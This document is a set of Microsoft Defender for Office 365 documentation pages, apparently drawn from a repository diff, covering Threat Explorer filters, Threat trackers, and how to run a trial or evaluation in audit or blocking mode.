--- [Email view for the details area of the All email view in Threat Explorer](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)-- [Email view for the details area of the Malware view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-malware-view-in-threat-explorer-and-real-time-detections)-- [Email view for the details area of the Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections)-
-> [!TIP]
-> For the permissions required to search for mail flow rules by name in Threat Explorer, see [Permissions and licensing for Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#permissions-and-licensing-for-threat-explorer-and-real-time-detections). No special permissions are required to see rule names in email details flyouts, details tables, and exported results.
-
-### Inbound connectors
-
-Inbound connectors specify specific settings for email sources for Microsoft 365. For more information, see [Configure mail flow using connectors in Exchange Online](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/use-connectors-to-configure-mail-flow).
-
-To find messages that were affected by inbound connectors, you can use the **Connector** filterable property to search for connectors by name in the **All email**, **Malware**, and **Phish** views in Threat Explorer (not in Real-time detections). You enter a partial text value for the name of the connector. For more information, see the following links:
--- [All email view in Threat Explorer](threat-explorer-real-time-detections-about.md#all-email-view-in-threat-explorer)-- [Malware view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#malware-view-in-threat-explorer-and-real-time-detections)-- [Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#phish-view-in-threat-explorer-and-real-time-detections)-
-The **Email** tab (view) for the details area of the **All email**, **Malware**, and **Phish** views in Threat Explorer also have **Connector** as an available column that's not selected by default. This column shows the name of the connector. For more information, see the following links:
--- [Email view for the details area of the All email view in Threat Explorer](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)-- [Email view for the details area of the Malware view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-malware-view-in-threat-explorer-and-real-time-detections)-- [Email view for the details area of the Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections)-
-## Email security scenarios in Threat Explorer and Real-time detections
-
-For specific scenarios, see the following articles:
--- [Email security with Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-email-security.md)-- [Investigate malicious email that was delivered in Microsoft 365](threat-explorer-investigate-delivered-malicious-email.md)-
-### More ways to use Threat Explorer and Real-time detections
-
-In addition to the scenarios outlined in this article, you have more options in Explorer or Real-time detections. For more information, see the following articles:
--- [Threat protection status report](reports-email-security.md#threat-protection-status-report)-- [Automated investigation and response in Microsoft Defender XDR](../defender/m365d-autoir.md)-- [Trigger an investigation from Threat Explorer](air-examples.md#example-a-security-administrator-triggers-an-investigation-from-threat-explorer).
security Threat Trackers https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/threat-trackers.md
- Title: Threat trackers in Microsoft Defender for Office 365 Plan 2
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier2
-
-description: Learn about Threat Trackers, including new Noteworthy Trackers, to help your organization stay on top of security concerns.
- Previously updated : 3/19/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Threat trackers in Microsoft Defender for Office 365 Plan 2
--
-Microsoft 365 organizations that have [Microsoft Defender for Office 365 Plan 2](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet) included in their subscription or purchased as an add-on have _Threat trackers_. Threat trackers are queries that you create and save in [Threat Explorer (also known as Explorer)](threat-explorer-real-time-detections-about.md). You use these queries to automatically or manually discover cybersecurity threats in your organization.
-
-For information about creating and saving queries in Threat Explorer, see [Saved queries in Threat Explorer](threat-explorer-real-time-detections-about.md#saved-queries-in-threat-explorer).
-
-## Permissions and licensing for Threat trackers
-
-To use Threat trackers, you need to be assigned permissions. You have the following options:
--- [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md):
- - _Create, save, and modify Threat Explorer queries_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to Threat Explorer queries on the Threat tracker page_: Membership in the **Security Reader** or **Global Reader** role groups.
-- [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership these roles gives users the required permissions _and_ permissions for other features in Microsoft 365:
- - _Create, save, and modify Threat Explorer queries_: Membership in the **Global Administrator** or **Security Administrator** roles.
- - _Read-only access to Threat Explorer queries on the Threat tracker page_: Membership in the **Security Reader** or **Global Reader** roles.
-
-To remediate messages in Threat Explorer, you need additional permissions. For more information, see [Permissions and licensing for Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#permissions-and-licensing-for-threat-explorer-and-real-time-detections).
-
-To use Threat Explorer or Threat trackers, you need to be assigned a license for Defender for Office 365 (included in your subscription or an add-on license).
-
-Threat Explorer and Threat trackers contain data for users with Defender for Office 365 licenses assigned to them.
-
-## Threat trackers
-
-The **Threat tracker** page is available in the Microsoft Defender portal at <https://security.microsoft.com> at **Email & collaboration** \> **Threat tracker**. Or, to go directly to the **Threat tracker** page, use <https://security.microsoft.com/threattrackerv2>.
-
-The **Threat tracker** page contains three tabs:
--- **Saved queries**: Contains all queries that you saved in Threat Explorer.-- **Tracked queries**: Contains the results of queries that you saved in Threat Explorer where you selected **Track query**. The query automatically runs periodically, and the results are shown on this tab.-- **Trending campaigns**: We populate the information on this tab to highlight new threats received in your organization.-
-These tabs are described in the following subsections.
-
-### Saved queries tab
-
-The **Save queries** tab on the **Threat tracker** page at <https://security.microsoft.com/threattrackerv2> contains all of your saved queries from Threat Explorer. You can use these queries without having to re-create the search filters.
-
-The following information is shown on the **Save queries** tab. You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Date created**-- **Name**-- **Type**-- **Author**-- **Last executed**-- **Tracked query**: This value is controlled by whether you selected **Track this query** when you created the query in Threat Explorer:
- - **No**: You need to run the query manually.
- - **Yes**: The query automatically runs periodically. The query and the results are also available on the **Tracked queries** page.
-- **Actions**: Select **Explore** to open and run the query in Threat Explorer, or to update or save a modified or unmodified copy of the query in Threat Explorer.-
-If you select a query, the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** and :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** actions that appear.
-
-If you select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**, you can update the date and **Track query** settings of the existing query in the details flyout that opens.
-
-### Tracked queries
-
-The **Tracked queries** tab on the **Threat tracker** page at <https://security.microsoft.com/threattrackerv2> contains the results of queries that you created in Threat Explorer where you selected **Track this query**. Tracked queries run automatically, giving you up-to-date information without having to remember to run the queries.
-
-The following information is shown on the **Tracked queries** tab. You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Date created**-- **Name**-- **Today's message count**-- **Prior day message count**-- **Trend: today vs. prior week**-- **Actions**: Select **Explore** to open and run the query in Threat Explorer.-
-If you select a query, the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action appears. If you select this action, you can update the date and **Track query** settings of the existing query in the details flyout that opens.
-
-### Trending campaigns tab
-
-The **Trending campaigns** tab on the **Threat tracker** page at <https://security.microsoft.com/threattrackerv2> automatically highlights new email threats that were recently received by your organization.
-
-The following information is shown on the **Trending campaigns** tab. You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Malware family**-- **Prior day message count**-- **Trend: today vs. prior week**-- **Targeting: your company vs. global**-- **Actions**: Select **Explore** to open and run the query in Threat Explorer.
security Trial User Guide Defender For Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/trial-user-guide-defender-for-office-365.md
- Title: Microsoft Defender for Office 365 trial user guide-- NOCSH------- m365-security-- tier1--- MOE150-- MET150
-description: "Microsoft Defender for Office 365 solutions trial user guide."
- Previously updated : 6/23/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Trial user guide: Microsoft Defender for Office 365
--
-Welcome to the Microsoft Defender for Office 365 trial user guide! This user guide helps you make the most of your free trial by teaching you how to safeguard your organization against malicious threats posed by email messages, links (URLs), and collaboration tools.
-
-## What is Defender for Office 365?
-
-Defender for Office 365 helps organizations secure their enterprise by offering a comprehensive slate of capabilities, including threat protection policies, reports, threat investigation and response capabilities, and automated investigation and response capabilities.
--
-In addition to the detection of advanced threats, the following video shows how the SecOps capabilities of Defender for Office 365 can help your team respond to threats:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RWMmIe]
-
-### Audit mode vs. blocking mode for Defender for Office 365
-
-Do you want your Defender for Office 365 experience to be active or passive? These are the two modes that you can select from:
--- **Audit mode**: Special *evaluation policies* are created for anti-phishing (which includes impersonation protection), Safe Attachments, and Safe Links. These evaluation policies are configured to *detect* threats only. Defender for Office 365 detects harmful messages for reporting, but the messages aren't acted upon (for example, detected messages aren't quarantined). The settings of these evaluation policies are described in the [Policies in audit mode](try-microsoft-defender-for-office-365.md#policies-in-audit-mode) section later in this article.-
- Audit mode provides access to customized reports for threats detected by the evaluation policies in Defender for Office 365 on the **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation>.
--- **Blocking mode**: The Standard template for [preset security policies](preset-security-policies.md#profiles-in-preset-security-policies) is turned on and used for the trial, and the users you specify to include in the trial are added to the Standard preset security policy. Defender for Office 365 *detects* and *takes action on* harmful messages (for example, detected messages are quarantined).-
- The default and recommended selection is to scope these Defender for Office 365 policies to all users in the organization. But, during or after the setup of your trial, you can change the policy assignment to specific users, groups, or email domains in the Microsoft Defender portal or in PowerShell.
-
- Blocking mode doesn't provide customized reports for threats detected by Defender for Office 365. Instead, the information is available in the regular reports and investigation features of Defender for Office 365 Plan 2. For more information, see [Reports for blocking mode](try-microsoft-defender-for-office-365.md#reports-for-blocking-mode).
-
-The key factors that determine which modes are available to you are:
--- Whether or not you currently have Defender for Office 365 (Plan 1 or Plan 2) as described in [Evaluation vs. trial for Defender for Office 365](try-microsoft-defender-for-office-365.md#evaluation-vs-trial-for-defender-for-office-365).-- How email is delivered to your Microsoft 365 organization as described in the following scenarios:-
- - Mail from the internet flows directly Microsoft 365, but your current subscription has only [Exchange Online Protection (EOP)](eop-about.md) or [Defender for Office 365 Plan 1](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet).
-
- :::image type="content" source="../../medio-trial-mail-flow.png":::
-
- In these environments, **audit mode** or **blocking mode** are available, [depending on your licensing](try-microsoft-defender-for-office-365.md#evaluation-vs-trial-for-defender-for-office-365).
-
- - You're currently using a third-party service or device for email protection of your Microsoft 365 mailboxes. Mail from the internet flows through the protection service before delivery into your Microsoft 365 organization. Microsoft 365 protection is as low as possible (it's never completely off; for example, malware protection is always enforced).
-
- :::image type="content" source="../../medio-migration-before.png":::
-
- In these environments, only **audit mode** is available. You don't need to change your mail flow (MX records) to evaluate Defender for Office 365 Plan 2.
-
-Let's get started!
-
-## Blocking mode
-
-### Step 1: Getting started in blocking mode
-
-#### Start your Microsoft Defender for Office 365 trial
-
-After you've initiated the trial and completed the [setup process](try-microsoft-defender-for-office-365.md#set-up-an-evaluation-or-trial-in-blocking-mode), it may take up to 2 hours for changes to take effect.
-
-We've automatically enabled the [Standard preset security policy](preset-security-policies.md) in your environment. This profile represents a baseline protection profile that's suitable for most users. Standard protection includes:
--- Safe Links, Safe Attachments and anti-phishing policies that are scoped to the entire tenant or subset of users you may have chosen during the trial setup process.-- Safe Attachments protection for SharePoint, OneDrive, and Microsoft Teams.-- Safe Links protection for supported Office 365 apps.-
-Watch this video to learn more: [Protect against malicious links with Safe Links in Microsoft Defender for Office 365 - YouTube](https://www.youtube.com/watch?v=vhIJ1Veq36Y&list=PL3ZTgFEc7LystRja2GnDeUFqk44k7-KXf&index=9).
-
-#### Enable users to report suspicious content in blocking mode
-
-Defender for Office 365 enables users to report messages to their security teams and allows admins to submit messages to Microsoft for analysis.
--- Verify or configure [user reported settings](submissions-user-reported-messages-custom-mailbox.md) so reported messages go to a specified reporting mailbox, to Microsoft, or both.-- Deploy the [Report Message add-in or the Report Phishing add-in](submissions-users-report-message-add-in-configure.md) for users to report messages. Or, users can use the built-in **Report** button in Outlook on the web (formerly known as Outlook Web App or OWA).-- Establish a workflow to [Report false positives and false negatives](submissions-outlook-report-messages.md).-- Use the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user> to see and manage user reported messages.-
-Watch this video to learn more: [Learn how to use the Submissions page to submit messages for analysis - YouTube](https://www.youtube.com/watch?v=ta5S09Yz6Ks&ab_channel=MicrosoftSecurit).
-
-#### Review reports to understand the threat landscape in blocking mode
-
-Use the reporting capabilities in Defender for Office 365 to get more details about your environment.
--- Understand threats received in email and collaboration tools with the [Threat protection status report](reports-email-security.md#threat-protection-status-report).-- See where threats are blocked with the [Mailflow status report](reports-email-security.md#mailflow-status-report).-- Use the [URL protection report](reports-defender-for-office-365.md#url-protection-report) to review links that were viewed by users or blocked by the system.--
-### Step 2: Intermediate steps in blocking mode
-
-#### Prioritize focus on your most targeted users
-
-Protect your most targeted and most visible users with Priority Account Protection in Defender for Office 365, which helps you prioritize your workflow to ensure these users are safe.
--- Identify your most targeted or most visible users.-- [Tag these users](/microsoft-365/admin/setup/priority-accounts#add-priority-accounts-from-the-microsoft-365-defender-page) as priority accounts.-- Track threats to priority accounts throughout the portal.-
-Watch this video to learn more: [Protecting priority accounts in Microsoft Defender for Office 365 - YouTube](https://www.youtube.com/watch?v=tqnj0TlzQcI&list=PL3ZTgFEc7LystRja2GnDeUFqk44k7-KXf&index=11).
--
-### Avoid costly breaches by preventing user compromise
-
-Get alerted to potential compromise and automatically limit the impact of these threats to prevent attackers from gaining deeper access to your environment.
--- Review [compromised user alerts](address-compromised-users-quickly.md#compromised-user-alerts).-- [Investigate and respond](address-compromised-users-quickly.md) to compromised users.--
-Watch this video to learn more: [Detect and respond to compromise in Microsoft Defender for Office 365 - YouTube](https://www.youtube.com/watch?v=Pc7y3a-wdR0&list=PL3ZTgFEc7LystRja2GnDeUFqk44k7-KXf&index=5).
-
-#### Use Threat Explorer to investigate malicious email
-
-Defender for Office 365 enables you to investigate activities that put people in your organization at risk and to take action to protect your organization. You can do this using [Threat Explorer (Explorer)](threat-explorer-real-time-detections-about.md):
--- [Find suspicious email that was delivered](threat-explorer-investigate-delivered-malicious-email.md#find-suspicious-email-that-was-delivered): Find and delete messages, identify the IP address of a malicious email sender, or start an incident for further investigation.-- [Email security scenarios in Threat Explorer and Real-time detections](threat-explorer-threat-hunting.md#email-security-scenarios-in-threat-explorer-and-real-time-detections)-
-#### See campaigns targeting your organization
-
-See the bigger picture with Campaign Views in Defender for Office 365, which gives you a view of the attack campaigns targeting your organization and the impact they have on your users.
--- [Identify campaigns](campaigns.md#what-is-a-campaign) targeting your users.-- [Visualize the scope](campaigns.md#campaigns-page-in-the-microsoft-defender-portal) of the attack.-- [Track user interaction](campaigns.md#campaign-details) with these messages.-
- :::image type="content" source="../../medio-trial-playbook-campaign-details.png":::
-
-Watch this video to learn more: [Campaign Views in Microsoft Defender for Office 365 - YouTube](https://www.youtube.com/watch?v=DvqzzYKu7cQ&list=PL3ZTgFEc7LystRja2GnDeUFqk44k7-KXf&index=14).
-
-#### Use automation to remediate risks
-
-Respond efficiently using Automated investigation and response (AIR) to review, prioritize, and respond to threats.
--- [Learn more](air-examples.md) about investigation user guides.-- [View details and results](email-analysis-investigations.md) of an investigation.-- Eliminate threats by [approving remediation actions](air-remediation-actions.md).--
-### Step 3: Advanced content in blocking mode
-
-#### Dive deep into data with query-based hunting
-
-Use Advanced hunting to write custom detection rules, proactively inspect events in your environment, and locate threat indicators. Explore raw data in your environment.
--- [Build custom detection rules](../defender/custom-detections-overview.md).-- [Access shared queries](../defender/advanced-hunting-shared-queries.md) created by others.-
-Watch this video to learn more: [Threat hunting with Microsoft Defender XDR - YouTube](https://www.youtube.com/watch?v=l3OmH4U6XAs&list=PL3ZTgFEc7Lyt1O81TZol31YXve4e6lyQu&index=4).
-
-#### Train users to spot threats by simulating attacks
-
-Equip your users with the right knowledge to identify threats and report suspicious messages with Attack simulation training in Defender for Office 365.
--- [Simulate realistic threats](attack-simulation-training-simulations.md) to identify vulnerable users.-- [Assign training](attack-simulation-training-simulations.md#assign-training) to users based on simulation results.-- [Track progress](attack-simulation-training-insights.md) of your organization in simulations and training completion.-
- :::image type="content" source="../../medio-trial-playbook-attack-simulation-training-results.png":::
-
-## Auditing mode
-
-### Step 1: Get started in auditing mode
-
-#### Start your Defender for Office 365 evaluation
-
-After you've completed the [setup process](try-microsoft-defender-for-office-365.md#set-up-an-evaluation-or-trial-in-audit-mode), it may take up to 2 hours for changes to take effect. We've automatically configured Preset Evaluation policies in your environment.
-
-Evaluation policies ensure no action is taken on email that's detected by Defender for Office 365.
-
-#### Enable users to report suspicious content in auditing mode
-
-Defender for Office 365 enables users to report messages to their security teams and allows admins to submit messages to Microsoft for analysis.
--- Verify or configure [user reported settings](submissions-user-reported-messages-custom-mailbox.md) so reported messages go to a specified reporting mailbox, to Microsoft, or both.-- Deploy the [Report Message add-in or the Report Phishing add-in](submissions-users-report-message-add-in-configure.md) for users to report messages. Or, users can use the built-in **Report** button in Outlook on the web (formerly known as Outlook Web App or OWA).-- Establish a workflow to [Report false positives and false negatives](submissions-outlook-report-messages.md).-- Use the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user> to see and manage user reported messages.-
-Watch this video to learn more: [Learn how to use the Submissions page to submit messages for analysis - YouTube](https://www.youtube.com/watch?v=ta5S09Yz6Ks&ab_channel=MicrosoftSecurit).
-
-#### Review reports to understand the threat landscape in auditing mode
-
-Use the reporting capabilities in Defender for Office 365 to get more details about your environment.
--- The [Evaluation dashboard](try-microsoft-defender-for-office-365.md#reports-for-audit-mode) provides an easy view of the threats detected by Defender for Office 365 during evaluation.-- Understand threats received in email and collaboration tools with the [Threat protection status report](reports-email-security.md#threat-protection-status-report).-
-### Step 2: Intermediate steps in auditing mode
-
-#### Use Threat Explorer to investigate malicious email in auditing mode
-
-Defender for Office 365 enables you to investigate activities that put people in your organization at risk and to take action to protect your organization. You can do this using [Threat Explorer (Explorer)](threat-explorer-real-time-detections-about.md):
--- [Find suspicious email that was delivered](threat-explorer-investigate-delivered-malicious-email.md#find-suspicious-email-that-was-delivered): Find and delete messages, identify the IP address of a malicious email sender, or start an incident for further investigation.-- [Email security scenarios in Threat Explorer and Real-time detections](threat-explorer-threat-hunting.md#email-security-scenarios-in-threat-explorer-and-real-time-detections)-
-#### Convert to Standard Protection at the end of evaluation period
-
-When you're ready to turn on Defender for Office 365 policies in production, you can use [Convert to Standard Protection](try-microsoft-defender-for-office-365.md#convert-to-standard-protection) to easily move from audit mode to blocking mode by turning on the [Standard preset security policy](preset-security-policies.md#profiles-in-preset-security-policies), which contains any/all recipients from audit mode.
-
-#### Migrate from a third-party protection service or device to Defender for Office 365
-
-If you already have an existing third-party protection service or device that sits in front of Microsoft 365, you can migrate your protection to Microsoft Defender for Office 365 to get the benefits of a consolidated management experience, potentially reduced cost (using products that you already pay for), and a mature product with integrated security protection.
-
-For more information, see [Migrate from a third-party protection service or device to Microsoft Defender for Office 365](migrate-to-defender-for-office-365.md).
-
-### Step 3: Advanced content in auditing mode
-
-#### Train users to spot threats by simulating attacks in auditing mode
-
-Equip your users with the right knowledge to identify threats and report suspicious messages with Attack simulation training in Defender for Office 365.
--- [Simulate realistic threats](attack-simulation-training-simulations.md) to identify vulnerable users.-- [Assign training](attack-simulation-training-simulations.md#assign-training) to users based on simulation results.-- [Track progress](attack-simulation-training-insights.md) of your organization in simulations and training completion.-
- :::image type="content" source="../../medio-trial-playbook-attack-simulation-training-results.png":::
-
-## Additional resources
--- **Interactive guide**: Unfamiliar with Defender for Office 365? Review the [interactive guide](https://mslearn.cloudguides.com/guides/Safeguard%20your%20organization%20with%20Microsoft%20Defender%20for%20Office%20365) to understand how to get started.-- **Fast Track Get Started Guide***: [Microsoft Defender for Office 365](https://go.microsoft.com/fwlink/p/?linkid=2197415)-- **Microsoft Defender for Office 365 documentation**: Get detailed information on how Defender for Office 365 works and how to best implement it for your organization. Visit the [Microsoft Defender for Office 365 documentation](mdo-about.md).-- **What's included**: For a full list of Office 365 email security features listed by product tier, view the [Feature Matrix](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description#feature-availability).-- **Why Defender for Office 365**: The [Defender for Office 365 Datasheet](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4FCiy) shows the top 10 reasons customers choose Microsoft.
security Try Microsoft Defender For Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/try-microsoft-defender-for-office-365.md
- Title: Try and evaluate Defender for Office 365
-description: Learn how to evaluate and try the capabilities of Microsoft Defender for Office 365 without affecting your existing mail flow.
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier1
--
-ROBOTS:
Previously updated : 4/8/2024--
-# Try Microsoft Defender for Office 365
-
-As an existing Microsoft 365 customer, the **Trials** and **Evaluation** pages in the Microsoft Defender portal at <https://security.microsoft.com> allow you to try the features of Microsoft Defender for Office 365 Plan 2 before you buy.
-
-Before you try Defender for Office 365 Plan 2, there are some key questions that you need to ask yourself:
--- Do I want to passively observe what Defender for Office 365 Plan 2 can do for me (*audit*), or do I want Defender for Office 365 Plan 2 to take direct action on issues that it finds (*block*)?-- Either way, how can I tell what Defender for Office 365 Plan 2 is doing for me?-- How long do I have before I need to make the decision to keep Defender for Office 365 Plan 2?-
-This article helps you answer those questions so you can try Defender for Office 365 Plan 2 in a way that best meets the needs of your organization.
-
-For a companion guide for how to use your trial, see [Trial User Guide: Microsoft Defender for Office 365](trial-user-guide-defender-for-office-365.md).
-
-> [!NOTE]
-> Trials and evaluations of Defender for Office 365 aren't available in U.S. Government organizations (Microsoft 365 GCC, GCC High, and DoD) or Microsoft 365 Education organizations.
-
-## Overview of Defender for Office 365
-
-Defender for Office 365 helps organizations secure their enterprise by offering a comprehensive slate of capabilities. For more information, see [Microsoft Defender for Office 365](mdo-about.md).
-
-You can also learn more about Defender for Office 365 at this [interactive guide](https://aka.ms/MS365D.InteractiveGuide).
--
-Watch this short video to learn more about how you can get more done in less time with Microsoft Defender for Office 365.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RWMmIe]
-
-For pricing information, see [Microsoft Defender for Office 365](https://www.microsoft.com/security/business/siem-and-xdr/microsoft-defender-office-365).
-
-## How trials and evaluations work for Defender for Office 365
-
-### Policies
-
-Defender for Office 365 includes the features of Exchange Online Protection (EOP), which are present in all Microsoft 365 organizations with Exchange Online mailboxes, and features that are exclusive to Defender for Office 365.
-
-The protection features of EOP and Defender for Office 365 are implemented using policies. **Policies that are exclusive to Defender for Office 365 are created for you as needed**:
--- [Impersonation protection in anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)-- [Safe Attachments for email messages](safe-attachments-about.md)-- [Safe Links for email messages and Microsoft Teams](safe-links-about.md)
- - Safe Links detonates URLs during mail flow. To prevent specific URLs from being detonated, submit the URLs to Microsoft as good URLs. For instructions, see [Report good URLs to Microsoft](submissions-admin.md#report-good-urls-to-microsoft).
- - Safe Links doesn't wrap URL links in email message bodies.
-
-Your eligibility for an evaluation or trial means you already have EOP. **No new or special EOP policies are created for your evaluation or trial of Defender for Office 365 Plan 2**. Existing EOP policies in your Microsoft 365 organization remain able to act on messages (for example, send messages to the Junk Email folder or to quarantine):
--- [Anti-malware policies](anti-malware-protection-about.md)-- [Inbound anti-spam protection](anti-spam-protection-about.md)-- [Anti-spoofing protection in anti-phishing policies](anti-phishing-policies-about.md#spoof-settings)-
-The default policies for these EOP features are always on, apply to all recipients, and are always applied last after any custom policies.
-
-### Audit mode vs. blocking mode for Defender for Office 365
-
-Do you want your Defender for Office 365 experience to be active or passive? The following modes are available:
--- **Audit mode**: Special _evaluation policies_ are created for anti-phishing (which includes impersonation protection), Safe Attachments, and Safe Links. These evaluation policies are configured to _detect_ threats only. Defender for Office 365 detects harmful messages for reporting, but the messages aren't acted upon (for example, detected messages aren't quarantined). The settings of these evaluation policies are described in the [Policies in audit mode](#policies-in-audit-mode) section later in this article. We also automatically turn on SafeLinks time of click protection in audit mode for non-email workloads (for example, Microsoft Teams, SharePoint, and OneDrive for Business)-
- You can also selectively turn on or turn off anti-phishing protection (spoofing and impersonation), Safe Links protection, and Safe Attachments protection. For instructions, see [Manage evaluation settings](#manage-evaluation-settings).
-
- Audit mode provides specialized reports for threats that are detected by the evaluation policies on the **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation>. These reports are described in the [Reports for audit mode](#reports-for-audit-mode) section later in this article.
--- **Blocking mode**: The Standard template for [preset security policies](preset-security-policies.md) is turned on and used for the trial, and the users you specify to include in the trial are added to the Standard preset security policy. Defender for Office 365 _detects and takes action on_ harmful messages (for example, detected messages are quarantined).-
- The default and recommended selection is to scope these Defender for Office 365 policies to all users in the organization. But during or after the setup of your trial, you can change the policy assignment to specific users, groups, or email domains in the Microsoft Defender portal or in [Exchange Online PowerShell](#policy-settings-associated-with-defender-for-office-365-evaluations-and-trials).
-
- Information about threats that are detected by Defender for Office 365 is available in the regular reports and investigation features of Defender for Office 365 Plan 2, which are described in the [Reports for blocking mode](#reports-for-blocking-mode) section later in this article.
-
-The key factors that determine which modes are available to you are:
--- Whether or not you currently have Defender for Office 365 (Plan 1 or Plan 2) as described in the next section.-- How email is delivered to your Microsoft 365 organization as described in the following scenarios:-
- - Mail from the internet flows directly Microsoft 365, but your current subscription has only [Exchange Online Protection (EOP)](eop-about.md) or [Defender for Office 365 Plan 1](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet).
-
- :::image type="content" source="../../medio-trial-mail-flow.png":::
-
- In these environments, **audit mode** or **blocking mode** are available, depending on your licensing as explained in the next section
-
- - You're currently using a third-party service or device for email protection of your Microsoft 365 mailboxes. Mail from the internet flows through the protection service before delivery into your Microsoft 365 organization. Microsoft 365 protection is as low as possible (it's never completely off; for example, malware protection is always enforced).
-
- :::image type="content" source="../../medio-migration-before.png":::
-
- In these environments, only **audit mode** is available. You don't need to change your mail flow (MX records) to evaluate Defender for Office 365 Plan 2.
-
-### Evaluation vs. trial for Defender for Office 365
-
-What's the difference between an evaluation and a trial of Defender for Office 365 Plan 2? Aren't they the same thing? Well, yes and no. The licensing in your Microsoft 365 organization makes all the difference:
--- **No Defender for Office 365 Plan 2**: If you don't already have Defender for Office 365 Plan 2 (for example, you have standalone EOP, Microsoft 365 E3, Microsoft 365 Business Premium, or a Defender for Office 365 Plan 1 add-on subscription), you can start the Defender for Office 365 Plan 2 experience from the following locations in the Microsoft Defender portal:-
- - The **Microsoft 365 trials** page at <https://security.microsoft.com/trialHorizontalHub>.
- - The **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation>.
-
- You can select **audit mode** (evaluation policies) or **blocking mode** (Standard preset security policy) during the set up of the evaluation or trial.
-
- Regardless of which location you use, we automatically provision any required Defender for Office 365 Plan 2 licenses when you enroll. Manually getting and assigning Plan 2 licenses in the Microsoft 365 admin center isn't required.
-
- The automatically provisioned licenses are good for 90 days. What this 90 day period means depends the existing licensing in your organization:
-
- - **No Defender for Office 365 Plan 1**: For organizations without Defender for Office 365 Plan 1 (for example, standalone EOP or Microsoft 365 E3) all Defender for Office 365 Plan 2 features (in particular, the security policies) are available during the 90 day period only.
-
- - **Defender for Office 365 Plan 1**: Organizations with Defender for Office 365 Plan 1 (for example, Microsoft 365 Business Premium or add-on subscriptions) already have the same security policies that are available in Defender for Office 365 Plan 2: impersonation protection in anti-phishing policies, Safe Attachments policies, and Safe Links policies.
-
- The security policies from **audit mode** (evaluation policies) or **blocking mode** (Standard preset security policy) don't expire or stop working after 90 days. What ends after 90 days are the [automation, investigation, remediation, and education capabilities](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet) of Defender for Office 365 Plan 2 that aren't available in Plan 1.
-
- If you set up your evaluation or trial in **audit mode** (evaluation policies), you can later _convert_ to **blocking mode** (Standard preset security policy). For instructions, see the [Convert to Standard protection](#convert-to-standard-protection) section later in this article.
--- **Defender for Office 365 Plan 2**: If you already have Defender for Office 365 Plan 2 (for example, as part of a Microsoft 365 E5 subscription), **Defender for Office 365** isn't available to select on the **Microsoft 365 trials** page at <https://security.microsoft.com/trialHorizontalHub>.-
